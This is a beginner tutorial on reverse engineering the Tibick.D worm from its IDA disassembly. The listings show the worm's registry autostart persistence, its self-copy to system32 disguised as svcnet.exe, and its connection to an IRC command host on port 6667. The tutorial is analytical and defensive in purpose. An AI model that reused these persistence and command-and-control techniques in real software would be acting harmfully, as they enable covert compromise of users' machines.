Malware is a serious threat to computer systems. The term 'malware' covers many different types of malicious code, including viruses, worms, rootkits, spyware and other threats. A long formal definition of 'malware' and its variants is beyond the scope of this article, so I'll only give a very brief distinction between viruses and worms. A virus replicates itself by attaching itself to some form of executable code, for example PE files (.exe, .dll, ...) on Windows, whereas a worm mostly spreads over the internet. A worm exploits security holes in software, sends itself to other users disguised as a trustworthy email, or uses peer-to-peer technology. There are more differences, but they have already been discussed repeatedly in other articles.
Being able to understand and dissect the inner workings of such malicious code is an important ability in the field of reverse engineering: it makes it possible to determine how the malware modifies a system, to harden systems against malicious code and to recognize malicious code reliably. The aim of this article is to give an introduction to the field of malware analysis. The worm dissected later in this article is neither new nor unknown and has been analyzed already. A very simple and primitive worm has been chosen to make this article as understandable as possible, especially to those who have never reversed a worm before or are (relatively) new to reverse engineering.
This article might not be very interesting for advanced (malware) reversers.
The reader of this paper should have basic knowledge of x86 assembly language and the Win32 API, including its networking capabilities (WinSock). However, since the code and structure of the Tibick.D worm are very simple and easy to follow, the code should be understandable even if you don't have much experience in reading disassembled code. Besides that, the reader should have some practice with their favorite disassembler (and debugger).
The software used in this document is available for free on the internet.
The worm Tibick.D is a fairly simple variant of a worm. It has to be downloaded and run by the user. It doesn't infect existing files, and it spreads over various peer-to-peer networks under a lot of different filenames (as we will see later). I've chosen this worm to give an introduction to malware reversing. In further articles we'll dissect more complicated examples which use more sophisticated techniques to hide their presence or to spread.
In this article we'll analyze our target only by looking at the disassembly. Normally other techniques and programs are used as well, such as network sniffers or file/registry monitors, but since this is just a simple example of malware and a deadlisting of the code gives the most information, I left out these parts intentionally.
We will start by scanning the file with PEiD to find out whether a packer was used and with which compiler the worm has been compiled. PEiD will show "LCC Win32 1.x -> Jacob Navia [Overlay]", which sounds good, since we won't have to bother with unpacking the executable. However, we shouldn't trust PEiD completely, since it can be fooled by placing a fake signature at the entry point. The executable contains 3 sections (".text", ".data", ".idata"), which is a normal layout for exe files.
To go on, we use IDA to disassemble the file. The entry point of the executable looks rather normal, since it's the default entry point generated by the lcc compiler:
.text:00401219 public start
.text:00401219 start proc near
.text:00401219
.text:00401219 var_30 = word ptr -30h
.text:00401219 var_18 = dword ptr -18h
.text:00401219 var_4 = dword ptr -4
.text:00401219
.text:00401219 mov eax, large fs:0
.text:0040121F push ebp
.text:00401220 mov ebp, esp
.text:00401222 push 0FFFFFFFFh
.text:00401224 push offset unk_40401C
.text:00401229 push offset loc_40109A
.text:0040122E push eax
.text:0040122F mov large fs:0, esp
.text:00401236 sub esp, 10h
.text:00401239 push ebx
.text:0040123A push esi
.text:0040123B push edi
.text:0040123C mov [ebp+var_18], esp
.text:0040123F push eax
.text:00401240 fnstcw [esp+30h+var_30]
.text:00401243 or word ptr [esp], 300h
.text:00401249 fldcw [esp+30h+var_30]
.text:0040124C add esp, 4
.text:0040124F push 0
.text:00401251 push 0
.text:00401253 push offset dword_404028
.text:00401258 push offset dword_404024
.text:0040125D push offset dword_404020
.text:00401262 call __GetMainArgs
.text:00401267 push dword_404028
.text:0040126D push dword_404024
.text:00401273 push dword_404020
.text:00401279 mov dword_404014, esp
.text:0040127F call sub_402FE8
.text:00401284 add esp, 18h
.text:00401287 xor ecx, ecx
.text:00401289 mov [ebp+var_4], ecx
.text:0040128C push eax
.text:0040128D call exit
.text:00401292 leave
.text:00401293 retn
.text:00401293 start endp
First, a structured exception handler (SEH) is installed. After that, the executable retrieves the arguments and passes them to a function which seems to be the main() function defined by the programmer. To proceed, we take a look at that function (sub_402FE8):
.text:00402FE8 push ebp
.text:00402FE9 mov ebp, esp
.text:00402FEB push ecx
.text:00402FEC push edi
.text:00402FED call GetCommandLineA
.text:00402FF2 mov edi, eax
.text:00402FF4 cmp byte ptr [edi], 22h
.text:00402FF7 jnz short loc_40301C
.text:00402FF9 push 22h
.text:00402FFB mov eax, edi
.text:00402FFD inc eax
.text:00402FFE push eax
.text:00402FFF call strchr
.text:00403004 add esp, 8
.text:00403007 mov [ebp+var_4], eax
.text:0040300A or eax, eax
.text:0040300C jz short loc_403037
.text:0040300E mov edi, eax
.text:00403010 inc edi
.text:00403011 jmp short loc_403014
This code starts by obtaining a pointer to the command line string using the API GetCommandLineA and checks whether the first character is a quotation mark (its ASCII code is 0x22). If the first character is not a quotation mark, it jumps over the following code.
Otherwise it proceeds by searching the rest of the string for a quotation mark using strchr, a standard C function that searches for the first occurrence of a character in a string. The purpose of this snippet is to check whether the path of the program is separated from the arguments by quotation marks. When you run an executable by double-clicking on it, its path is enclosed in quotation marks to make spaces in path names possible; otherwise they wouldn't be distinguishable from the spaces between the path and the arguments.
Subsequently, the worm locates the beginning of the arguments by searching for the first character after a space (starting either from the second quotation mark, if any, or from the beginning of the string).
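The argument search described above can be modelled in a few lines of Python. This is only a sketch of the described behaviour, not a translation of the worm's code: the function name skip_program_path is made up, and what happens when no space is found is an assumption, since that part of the disassembly is not shown.

```python
def skip_program_path(cmdline: str) -> str:
    """Return the argument part of a Win32-style command line (sketch)."""
    pos = 0
    if cmdline.startswith('"'):
        # Look for the closing quotation mark, as the strchr call does.
        closing = cmdline.find('"', 1)
        if closing == -1:
            # No closing quote: the worm keeps the pointer it started with.
            return cmdline
        pos = closing + 1
    # The arguments begin at the first character after a space.
    space = cmdline.find(" ", pos)
    if space == -1:
        return ""  # assumption: no space means no arguments
    return cmdline[space:].lstrip(" ")


print(skip_program_path('"C:\\Program Files\\worm.exe" instant'))  # instant
print(skip_program_path("worm.exe instant"))                        # instant
```

Both example command lines are invented for illustration.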
.text:00403037 push 0 ; lpModuleName
.text:00403039 call GetModuleHandleA
.text:0040303E push 1
.text:00403040 push edi
.text:00403041 push 0
.text:00403043 push eax
.text:00403044 call sub_4029B3
.text:00403049 pop edi
.text:0040304A leave
.text:0040304B retn
.text:0040304B sub_402FE8 endp
This code passes the pointer to the program arguments and the module handle to the function at 0x4029B3. Now let's take a look at that function:
.text:004029B3 sub_4029B3 proc near ; CODE XREF: sub_402FE8+5C
.text:004029B3
.text:004029B3 Parameter = byte ptr -6C0h
.text:004029B3 var_5C0 = byte ptr -5C0h
.text:004029B3 var_4C0 = dword ptr -4C0h
.text:004029B3 var_4BC = dword ptr -4BCh
.text:004029B3 var_4B8 = dword ptr -4B8h
.text:004029B3 WSAData = WSAData ptr -4ACh
.text:004029B3 hKey = dword ptr -31Ch
.text:004029B3 ThreadId = dword ptr -318h
.text:004029B3 var_314 = byte ptr -314h
.text:004029B3 buf = byte ptr -214h
.text:004029B3 addr = byte ptr -114h
.text:004029B3 String = byte ptr -110h
.text:004029B3 name = sockaddr ptr -10h
.text:004029B3 lpString1 = dword ptr 10h
.text:004029B3
.text:004029B3 push ebp
.text:004029B4 mov ebp, esp
.text:004029B6 sub esp, 6C0h
.text:004029BC push ebx
.text:004029BD push esi
.text:004029BE push edi
.text:004029BF push offset aTbc3_hanged_tk ; "tbc3.hanged.tk"
.text:004029C4 call sub_40132B
.text:004029C9 pop ecx
.text:004029CA cmp eax, 50Eh
.text:004029CF jnz short loc_4029E3
.text:004029D1 push offset aTibicP2p3 ; "##TIBiC-P2P3##"
.text:004029D6 call sub_40132B
.text:004029DB pop ecx
.text:004029DC cmp eax, 349h
.text:004029E1 jz short loc_4029EB
.text:004029E3
.text:004029E3 loc_4029E3: ; CODE XREF: sub_4029B3+1C
.text:004029E3 push 0
.text:004029E5 call exit
IDA has already guessed names for some of the local variables, such as ThreadId or WSAData, which tells us that the malware will somehow use the socket functions and connect to the internet.
This routine starts by passing two hard-coded strings to a routine and comparing the results with hard-coded values. A reasonable guess is that the routine computes a simple checksum of each string, and that the result is compared to a hard-coded one to protect the important parts of the file against manipulation. To check this assumption, we take a look at sub_40132B:
.text:0040132B sub_40132B proc near ; CODE XREF: sub_4029B3+11
.text:0040132B ; sub_4029B3+23
.text:0040132B
.text:0040132B arg_0 = dword ptr 8
.text:0040132B
.text:0040132B push ebx
.text:0040132C mov ebx, [esp+arg_0]
.text:00401330 xor edx, edx
.text:00401332 mov ecx, edx
.text:00401334 jmp short loc_40133D
.text:00401336 ; ---------------------------------------------------------------------------
.text:00401336
.text:00401336 loc_401336: ; CODE XREF: sub_40132B+16
.text:00401336 movsx eax, byte ptr [ebx+ecx]
.text:0040133A add edx, eax
.text:0040133C inc ecx
.text:0040133D
.text:0040133D loc_40133D: ; CODE XREF: sub_40132B+9
.text:0040133D cmp byte ptr [ebx+ecx], 0
.text:00401341 jnz short loc_401336
.text:00401343 mov eax, edx
.text:00401345 pop ebx
.text:00401346 retn
.text:00401346 sub_40132B endp
To preserve its value, ebx is pushed at the beginning of the function, and the argument (the pointer to a string) is then moved to ebx. edx is set to zero by XORing it with itself and is then copied to ecx, so both registers start at zero. This is a standard example of optimization: the more obvious "mov edx,0" would need more space within the file (five bytes instead of two) and would be no faster than the method used by the compiler.
After that, the loop adds the value of each character to the edx register until the terminating null character is found, and the sum is returned in eax. That means that our assumption is right and the malware performs an integrity check on the two strings.
In any case, the two strings passed to this routine ("tbc3.hanged.tk" and "##TIBiC-P2P3##") seem to be important, so we should keep them in mind.
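To double-check the reading of sub_40132B, the additive checksum can be reimplemented and run over the two strings. The following is a minimal Python sketch; the function name additive_checksum is made up, and the sign extension done by movsx is modelled explicitly even though it makes no difference for plain ASCII.

```python
def additive_checksum(text: str) -> int:
    """Sum the sign-extended bytes of a string, like sub_40132B (sketch)."""
    total = 0
    for byte in text.encode("latin-1"):
        # movsx sign-extends the byte: values >= 0x80 count as negative.
        signed = byte - 256 if byte >= 0x80 else byte
        total = (total + signed) & 0xFFFFFFFF  # stay within 32 bits
    return total


for text, expected in (("tbc3.hanged.tk", 0x50E), ("##TIBiC-P2P3##", 0x349)):
    print(text, hex(additive_checksum(text)), additive_checksum(text) == expected)
```

Both strings produce exactly the constants the worm compares against (0x50E and 0x349). The sketch also shows how weak the check is: any rearrangement of the characters, for example "tbc3.hanged.kt", yields the same sum.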
After the checksumming, this code follows:
.text:004029EB lea eax, [ebp+WSAData]
.text:004029F1 push eax ; lpWSAData
.text:004029F2 push 101h ; wVersionRequested
.text:004029F7 call WSAStartup
.text:004029FC or eax, eax
.text:004029FE jz short loc_402A08
.text:00402A00 xor eax, eax
.text:00402A02 inc eax
.text:00402A03 jmp loc_402F36
.text:00402A08 ; ---------------------------------------------------------------------------
.text:00402A08
.text:00402A08 loc_402A08: ; CODE XREF: sub_4029B3+4B
.text:00402A08 call GetTickCount
.text:00402A0D push eax
.text:00402A0E call srand
.text:00402A13 push offset aTpguxbsfNjdspt ; "Tpguxbsf]Njdsptpgu]Xjoepxt]DvssfouWfstj"...
.text:00402A18 lea eax, [ebp+String]
.text:00402A1E push eax
.text:00402A1F call wsprintfA
.text:00402A24 push 0FFFFFFFFh
.text:00402A26 lea eax, [ebp+String]
.text:00402A2C push eax
.text:00402A2D call sub_4012FC
.text:00402A32 add esp, 14h
.text:00402A35 push 0 ; lpdwDisposition
.text:00402A37 lea eax, [ebp+hKey]
.text:00402A3D push eax ; phkResult
.text:00402A3E push 0 ; lpSecurityAttributes
.text:00402A40 push 0F003Fh ; samDesired
.text:00402A45 push 0 ; dwOptions
.text:00402A47 push 0 ; lpClass
.text:00402A49 push 0 ; Reserved
.text:00402A4B lea eax, [ebp+String]
.text:00402A51 push eax ; lpSubKey
.text:00402A52 push 80000002h ; hKey
.text:00402A57 call RegCreateKeyExA
.text:00402A5C push offset aSvcnet_exe ; lpString
.text:00402A61 call lstrlenA
.text:00402A66 push eax ; cbData
.text:00402A67 push offset aSvcnet_exe ; lpData
.text:00402A6C push 1 ; dwType
.text:00402A6E push 0 ; Reserved
.text:00402A70 push offset aShellapi32 ; lpValueName
.text:00402A75 push [ebp+hKey] ; hKey
.text:00402A7B call RegSetValueExA
.text:00402A80 push [ebp+hKey] ; hKey
.text:00402A86 call RegCloseKey
.text:00402A8B push 0 ; lpdwDisposition
.text:00402A8D lea eax, [ebp+hKey]
.text:00402A93 push eax ; phkResult
.text:00402A94 push 0 ; lpSecurityAttributes
.text:00402A96 push 0F003Fh ; samDesired
.text:00402A9B push 0 ; dwOptions
.text:00402A9D push 0 ; lpClass
.text:00402A9F push 0 ; Reserved
.text:00402AA1 lea eax, [ebp+String]
.text:00402AA7 push eax ; lpSubKey
.text:00402AA8 push 80000001h ; hKey
.text:00402AAD call RegCreateKeyExA
.text:00402AB2 push offset aSvcnet_exe ; lpString
.text:00402AB7 call lstrlenA
.text:00402ABC push eax ; cbData
.text:00402ABD push offset aSvcnet_exe ; lpData
.text:00402AC2 push 1 ; dwType
.text:00402AC4 push 0 ; Reserved
.text:00402AC6 push offset aShellapi32 ; lpValueName
.text:00402ACB push [ebp+hKey] ; hKey
.text:00402AD1 call RegSetValueExA
.text:00402AD6 push [ebp+hKey] ; hKey
.text:00402ADC call RegCloseKey
The code starts by initializing the WinSock API and checks the result. If initialization failed, the function returns, which leads to termination of the program. After the initialization, the tick count is used to seed the random number generator via srand, and various registry accesses follow. The name of the subkey accessed seems to be stored in an encrypted form: it is copied to a buffer using the wsprintf API, and a pointer to this buffer is then passed to a function which has to be the decryption routine, because otherwise the registry access would fail. The function takes two arguments. The first one (they are pushed in reverse order, since the C calling convention is used) is a pointer to the string which is going to be decrypted; the second one (0xFFFFFFFF) has no obvious meaning at this point, but it will become clear once we look into the function. The function itself isn't very long:
.text:004012FC sub_4012FC proc near ; CODE XREF: sub_4014DF+25
.text:004012FC ; sub_4016E6+36 ...
.text:004012FC
.text:004012FC arg_0 = dword ptr 10h
.text:004012FC arg_4 = dword ptr 14h
.text:004012FC
.text:004012FC push ebx
.text:004012FD push esi
.text:004012FE push edi
.text:004012FF mov esi, [esp+arg_0]
.text:00401303 mov ebx, [esp+arg_4]
.text:00401307 xor edi, edi
.text:00401309 jmp short loc_401315
.text:0040130B ; ---------------------------------------------------------------------------
.text:0040130B
.text:0040130B loc_40130B: ; CODE XREF: sub_4012FC+27
.text:0040130B movsx eax, byte ptr [esi+edi]
.text:0040130F add eax, ebx
.text:00401311 mov [esi+edi], al
.text:00401314 inc edi
.text:00401315
.text:00401315 loc_401315: ; CODE XREF: sub_4012FC+D
.text:00401315 mov ecx, esi
.text:00401317 or eax, 0FFFFFFFFh
.text:0040131A
.text:0040131A loc_40131A: ; CODE XREF: sub_4012FC+23
.text:0040131A inc eax
.text:0040131B cmp byte ptr [ecx+eax], 0
.text:0040131F jnz short loc_40131A
.text:00401321 cmp edi, eax
.text:00401323 jl short loc_40130B
.text:00401325 mov eax, esi
First the function saves the registers it is going to use (a normal function may only change the values of eax, ecx and edx) and then loads the first argument into esi and the second into ebx. edi is set to zero and serves as the counter in the loop that follows. The loop reads one character from the string, adds the second parameter to it and writes the resulting byte back to the string. After that, the length of the string is computed (in every round of the loop, which is a waste of clock cycles) and compared to edi, which is incremented each round. Once edi is greater than or equal to the length, the loop exits. In the particular case that the second parameter is 0xFFFFFFFF, every character of the string is simply decremented, since 0xFFFFFFFF is the two's complement representation of -1. To decode the string we can either implement the algorithm in our favorite language, apply it manually, or debug the malware while it decrypts the string. If you choose debugging, do it in an isolated environment and not on your real system: running the file up to this code and then stopping the process on a real machine risks the system's integrity, because the file might accidentally be executed completely in the debugger.
By doing so, we get the decrypted string "Software\Microsoft\Windows\CurrentVersion\Run", which is most probably used for creating an autostart entry for the malware. The key is created twice; only the root key argument of the two calls to RegCreateKeyExA differs. By right-clicking on the values we can tell IDA to display their symbolic names. That way we find out that the key is created under two root keys: HKEY_LOCAL_MACHINE (0x80000002) and HKEY_CURRENT_USER (0x80000001). The name and the value of the created entry are hard-coded to "Shellapi32" and "svcnet.exe", probably in the hope that they will be mistaken for the legitimate svchost process (Generic Host Process for Win32 Services), several instances of which run by default on a standard Windows installation.
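Implementing the algorithm in a scripting language is the safest of these options, since nothing from the worm has to be executed. Here is a minimal Python sketch; the helper name add_to_each_byte is made up, and only the part of the encoded string that IDA displays in the listing is used, because the rest is cut off there.

```python
def add_to_each_byte(data: bytes, delta: int) -> bytes:
    """Add delta to every byte, keeping only the low 8 bits (like 'mov [esi+edi], al')."""
    return bytes((b + delta) & 0xFF for b in data)


# Only the prefix that is visible in the IDA comment; the listing truncates the rest.
visible_prefix = b"Tpguxbsf]Njdsptpgu]Xjoepxt]DvssfouWfstj"

# 0xFFFFFFFF acts as -1, so every character is decremented by one.
print(add_to_each_byte(visible_prefix, 0xFFFFFFFF).decode("ascii"))
```

This prints Software\Microsoft\Windows\CurrentVersi, the beginning of the key name given above. Calling the same helper with a delta of 1 reverses the operation, which is presumably how the author of the worm produced the encoded string.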
After creating the autostart entries, the malware continues with this:
.text:00402AE1 push offset aSvcnet_exe ; lpName
.text:00402AE6 push 0 ; bInheritHandle
.text:00402AE8 push 1F0001h ; dwDesiredAccess
.text:00402AED call OpenMutexA
.text:00402AF2 mov edi, eax
.text:00402AF4 or eax, eax
.text:00402AF6 jz short loc_402B00
.text:00402AF8 xor eax, eax
.text:00402AFA inc eax
.text:00402AFB jmp loc_402F36
.text:00402B00 ; ---------------------------------------------------------------------------
.text:00402B00
.text:00402B00 loc_402B00: ; CODE XREF: sub_4029B3+143
.text:00402B00 push offset aSvcnet_exe ; lpName
.text:00402B05 push 0 ; bInitialOwner
.text:00402B07 push 0 ; lpMutexAttributes
.text:00402B09 call CreateMutexA
The worm uses a mutex with the name "svcnet.exe" to check whether it is already running on the system. A short description: a mutex, which is short for mutual exclusion, is a mechanism to ensure that an object is used by only one thread at any given time. If the mutex has not been created yet, OpenMutexA fails and returns zero, so execution continues with the CreateMutexA call and the code after it. Otherwise the function exits, since the mutex already exists and another instance of the malware seems to be running.
Subsequently the malware continues by examining its filename and path:
.text:00402B10 push 0 ; lpModuleName
.text:00402B12 call GetModuleHandleA
.text:00402B17 push 0FFh ; nSize
.text:00402B1C lea edx, [ebp+String]
.text:00402B22 push edx ; lpFilename
.text:00402B23 push eax ; hModule
.text:00402B24 call GetModuleFileNameA
.text:00402B29 push 0FFh ; uSize
.text:00402B2E lea eax, [ebp+buf]
.text:00402B34 push eax ; lpBuffer
.text:00402B35 call GetSystemDirectoryA
.text:00402B3A lea eax, [ebp+buf]
.text:00402B40 push eax
.text:00402B41 lea eax, [ebp+String]
.text:00402B47 push eax
.text:00402B48 call sub_40304C
.text:00402B4D add esp, 8
.text:00402B50 or eax, eax
.text:00402B52 jz short loc_402B6C
.text:00402B54 push offset aSvcnet_exe ; "svcnet.exe"
.text:00402B59 lea edx, [ebp+String]
.text:00402B5F push edx
.text:00402B60 call sub_40304C
.text:00402B65 add esp, 8
.text:00402B68 or eax, eax
.text:00402B6A jnz short loc_402BDE
This code obtains the filename of the current module and the path of the system directory. The module filename is passed to another function twice: once with the system directory as the second argument, and once with the string "svcnet.exe", which has already been used in the malware and is the name under which it plans to hide itself within the system. Both times the result of sub_40304C is tested against zero. It seems that the called function performs some kind of string comparison (most likely a substring search, since its result is later used as a pointer into the searched string) to check whether the malware is running from GetSystemDirectory()\svcnet.exe. The system directory is normally Windows\system32 or WinNT\system32. If the filename and path differ, this code is executed:
.text:00402B6C
.text:00402B6C loc_402B6C: ; CODE XREF: sub_4029B3+19F
.text:00402B6C push offset String2 ; lpString2
.text:00402B71 lea eax, [ebp+buf]
.text:00402B77 push eax ; lpString1
.text:00402B78 call lstrcatA
.text:00402B7D push offset aSvcnet_exe ; lpString2
.text:00402B82 lea eax, [ebp+buf]
.text:00402B88 push eax ; lpString1
.text:00402B89 call lstrcatA
.text:00402B8E push 0 ; bFailIfExists
.text:00402B90 lea eax, [ebp+buf]
.text:00402B96 push eax ; lpNewFileName
.text:00402B97 lea eax, [ebp+String]
.text:00402B9D push eax ; lpExistingFileName
.text:00402B9E call CopyFileA
.text:00402BA3 or eax, eax
.text:00402BA5 jnz short loc_402BAD
.text:00402BA7 inc eax
.text:00402BA8 jmp loc_402F36
.text:00402BAD ; ---------------------------------------------------------------------------
.text:00402BAD loc_402BAD: ; CODE XREF: sub_4029B3+1F2
.text:00402BAD push 0 ; nShowCmd
.text:00402BAF push 0 ; lpDirectory
.text:00402BB1 push 0 ; lpParameters
.text:00402BB3 lea eax, [ebp+buf]
.text:00402BB9 push eax ; lpFile
.text:00402BBA push offset aOpen ; lpOperation
.text:00402BBF push 0 ; hwnd
.text:00402BC1 call ShellExecuteA
.text:00402BC6 push offset aInstant ; lpString2
.text:00402BCB push [ebp+lpString1] ; lpString1
.text:00402BCE call lstrcmpA
.text:00402BD3 or eax, eax
.text:00402BD5 jz short loc_402BDE
.text:00402BD7 xor eax, eax
.text:00402BD9 jmp loc_402F36
The first call to lstrcatA appends a backslash to the system directory. The second call appends "svcnet.exe", and the resulting path is used as the destination argument of CopyFileA. So the malware indeed copies itself to the system directory under the name "svcnet.exe". Such behaviour is very common for malware, since a user might take the file for a normal system file and not notice that it is malicious. If the copying fails, the malware gives up and exits. If it succeeds, the created file is executed using the ShellExecuteA API. After the ShellExecuteA call, a call to lstrcmpA follows, in which the argument "lpString1" is compared to the string "instant". But what was passed to this function? The answer is that it is the pointer to the string with the program arguments. So if the command line was "...\malware.exe instant", the program continues execution; otherwise it exits.
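The branching of the last two listings is easier to follow when written as a small decision function. The Python model below only returns a description of the steps and touches neither files nor processes. The name startup_steps and the step labels are made up, and treating sub_40304C as a case-sensitive substring test is an assumption, since its code has not been examined here.

```python
def startup_steps(module_path: str, system_dir: str, args: str) -> list:
    """Model the worm's install-or-run decision (sketch, no side effects)."""

    def contains(haystack: str, needle: str) -> bool:
        # Assumption: sub_40304C behaves like a plain substring search.
        return needle in haystack

    installed = contains(module_path, system_dir) and contains(module_path, "svcnet.exe")
    if installed:
        return ["backdoor"]
    # Not running as <system dir>\svcnet.exe: copy, start the copy, then check args.
    # (If CopyFileA fails, the real code exits before launching anything.)
    steps = ["copy to system dir", "launch copy"]
    steps.append("backdoor" if args == "instant" else "exit")
    return steps


print(startup_steps(r"C:\WINDOWS\system32\svcnet.exe", r"C:\WINDOWS\system32", ""))
print(startup_steps(r"C:\Temp\song.exe", r"C:\WINDOWS\system32", ""))
```

The paths in the two calls are invented examples. The first call models the already installed copy, the second a freshly downloaded file started without arguments.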
Once the malware has placed itself in the system folder, it makes the system accessible to attackers. The following code is executed once the malware has verified that it is being run from the system folder under the desired name, or when the parameter "instant" was specified:
.text:00402BDE loc_402BDE: ; CODE XREF: sub_4029B3+1B7
.text:00402BDE ; sub_4029B3+222
.text:00402BDE lea eax, [ebp+ThreadId]
.text:00402BE4 push eax ; lpThreadId
.text:00402BE5 push 0 ; dwCreationFlags
.text:00402BE7 push 0 ; lpParameter
.text:00402BE9 push offset StartAddress ; lpStartAddress
.text:00402BEE push 0 ; dwStackSize
.text:00402BF0 push 0 ; lpThreadAttributes
.text:00402BF2 call CreateThread
.text:00402BF7
.text:00402BF7 loc_402BF7: ; CODE XREF: sub_4029B3+2DC
.text:00402BF7 ; sub_4029B3+57C
.text:00402BF7 push 10h
.text:00402BF9 lea eax, [ebp+name]
.text:00402BFC push eax
.text:00402BFD call RtlZeroMemory
.text:00402C02 mov [ebp+name.sa_family], 2
.text:00402C08 push 1A0Bh ; hostshort
.text:00402C0D call htons
.text:00402C12 mov edx, eax
.text:00402C14 mov word ptr [ebp+name.sa_data], dx
.text:00402C18 push offset aTbc3_hanged_tk ; cp
.text:00402C1D call inet_addr
.text:00402C22 mov dword ptr [ebp+addr], eax
.text:00402C28 cmp eax, 0FFFFFFFFh
.text:00402C2B jnz short loc_402C3B
.text:00402C2D push offset aTbc3_hanged_tk ; name
.text:00402C32 call gethostbyname
.text:00402C37 mov ebx, eax
.text:00402C39 jmp short loc_402C4D
.text:00402C3B ; ---------------------------------------------------------------------------
.text:00402C3B
.text:00402C3B loc_402C3B: ; CODE XREF: sub_4029B3+278
.text:00402C3B push 2 ; type
.text:00402C3D push 4 ; len
.text:00402C3F lea eax, [ebp+addr]
.text:00402C45 push eax ; addr
.text:00402C46 call gethostbyaddr
.text:00402C4B mov ebx, eax
.text:00402C4D
.text:00402C4D loc_402C4D: ; CODE XREF: sub_4029B3+286
.text:00402C4D or ebx, ebx
.text:00402C4F jnz short loc_402C5D
.text:00402C51 push 2710h ; dwMilliseconds
.text:00402C56 call Sleep
.text:00402C5B jmp short loc_402C8F
.text:00402C5D ; ---------------------------------------------------------------------------
The first thing it does is create a new thread to run in the background; we will ignore it for now and analyze it later. After creating the thread, the worm makes use of the Windows socket functions. It fills a 0x10-byte structure with zeros, which is later passed to connect(). IDA has typed it as a sockaddr struct, and the family value 2 (AF_INET) written to it fits. The code proceeds by converting the desired port to network byte order using the htons function. The port number to be converted is 0x1A0B, or 6667 in decimal, which is the default port for Internet Relay Chat (IRC).
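To make the byte order issue concrete, the 16-byte address structure can be rebuilt by hand. The Python sketch below assumes the usual IPv4 layout of that structure (a 2-byte family in host order, a 2-byte port in network order, a 4-byte address and 8 bytes of padding); the function name pack_sockaddr_in is made up for illustration.

```python
import struct

AF_INET = 2  # the value the worm writes to name.sa_family


def pack_sockaddr_in(port: int, ipv4: bytes = b"\x00\x00\x00\x00") -> bytes:
    """Build the 16-byte IPv4 socket address as it lies in memory on x86 (sketch)."""
    family = struct.pack("<H", AF_INET)    # host order, little-endian on x86
    net_port = struct.pack("!H", port)     # network order, which htons provides
    return family + net_port + ipv4 + bytes(8)


raw = pack_sockaddr_in(0x1A0B)
print(len(raw), raw[2:4].hex(), 0x1A0B)
```

This prints 16 1a0b 6667: the structure is 0x10 bytes long, and the port bytes are stored most significant byte first, which is exactly what the htons call guarantees on a little-endian machine.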
Next, the worm does something that looks pointless for a hard-coded host name: it tries to obtain the address of "tbc3.hanged.tk" using inet_addr(), which only converts IP addresses in the standard dot notation (e.g. "127.0.0.1") into the format used by the socket functions. The function is not suitable for host names like "www.google.com" or the one used by the malware. When inet_addr() fails and returns -1 (0xFFFFFFFF), the worm obtains the address of the host using the "correct" function gethostbyname(); had the conversion succeeded, gethostbyaddr() would have been called instead. In both cases the result is checked for validity. If it is invalid, the worm calls Sleep to wait 10 seconds (0x2710 milliseconds), then retries, and repeats this until the host is found.
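The "try the dotted form first, fall back to a name lookup" pattern can be tried out safely in Python. This is a simplified sketch: the name resolve_like_worm is made up, a literal IP address is returned as-is instead of going through a reverse lookup, and the lookup function is passed in so that the example below needs no network access.

```python
import socket


def resolve_like_worm(host: str, lookup=socket.gethostbyname) -> str:
    """Return an IPv4 address string for host (sketch of the fallback pattern)."""
    try:
        socket.inet_aton(host)   # succeeds only for numeric IPv4 notation
        return host
    except OSError:
        return lookup(host)      # name lookup, like gethostbyname()


# Made-up mapping so the example runs offline; 192.0.2.1 is a documentation address.
fake_dns = {"tbc3.hanged.tk": "192.0.2.1"}
print(resolve_like_worm("127.0.0.1", fake_dns.__getitem__))
print(resolve_like_worm("tbc3.hanged.tk", fake_dns.__getitem__))
```

For a host that is hard-coded as a name, the first branch can never succeed. The pattern only pays off when the same code has to accept both names and numeric addresses.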
So this is the place where the string "tbc3.hanged.tk", which was checked for integrity (in a very insecure manner) earlier, gets used. After obtaining a usable address for this host, it tries to connect to it:
.text:00402C5D loc_402C5D: ; CODE XREF: sub_4029B3+29C
.text:00402C5D mov eax, [ebx+0Ch]
.text:00402C60 mov eax, [eax]
.text:00402C62 mov eax, [eax]
.text:00402C64 mov dword ptr [ebp+name.sa_data+2], eax
.text:00402C67 push 6 ; protocol
.text:00402C69 push 1 ; type
.text:00402C6B push 2 ; af
.text:00402C6D call socket
.text:00402C72 mov esi, eax
.text:00402C74 push 10h ; namelen
.text:00402C76 lea eax, [ebp+name]
.text:00402C79 push eax ; name
.text:00402C7A push esi ; s
.text:00402C7B call connect
.text:00402C80 cmp eax, 0FFFFFFFFh
.text:00402C83 jnz short loc_402C94
.text:00402C85 push 2710h ; dwMilliseconds
.text:00402C8A call Sleep
.text:00402C8F
.text:00402C8F loc_402C8F: ; CODE XREF: sub_4029B3+2A8
.text:00402C8F jmp loc_402BF7
.text:00402C94 ; ---------------------------------------------------------------------------
.text:00402C94
.text:00402C94 loc_402C94: ; CODE XREF: sub_4029B3+2D0
.text:00402C94 push 100h
.text:00402C99 lea eax, [ebp+String]
.text:00402C9F push eax
.text:00402CA0 call sub_40129C
.text:00402CA5 mov [ebp+var_4B8], eax
.text:00402CAB push 100h
.text:00402CB0 lea edx, [ebp+var_314]
.text:00402CB6 push edx
.text:00402CB7 call sub_40129C
.text:00402CBC push eax
.text:00402CBD mov edx, [ebp+var_4B8]
.text:00402CC3 push edx
.text:00402CC4 push offset aNickSUserS__Ti ; "NICK %s\r\nUSER %s . . :TIBiCP2P\r\n"
.text:00402CC9 lea edx, [ebp+buf]
.text:00402CCF push edx
.text:00402CD0 call wsprintfA
.text:00402CD5 add esp, 20h
.text:00402CD8 lea eax, [ebp+buf]
.text:00402CDE push eax ; lpString
.text:00402CDF call lstrlenA
.text:00402CE4 push 0 ; flags
.text:00402CE6 push eax ; len
.text:00402CE7 lea edx, [ebp+buf]
.text:00402CED push edx ; buf
.text:00402CEE push esi ; s
.text:00402CEF call send
.text:00402CF4 cmp eax, 0FFFFFFFFh
.text:00402CF7 jnz short loc_402D08
.text:00402CF9 push 2710h ; dwMilliseconds
.text:00402CFE call Sleep
.text:00402D03 jmp loc_402F2F
.text:00402D08 ; ---------------------------------------------------------------------------
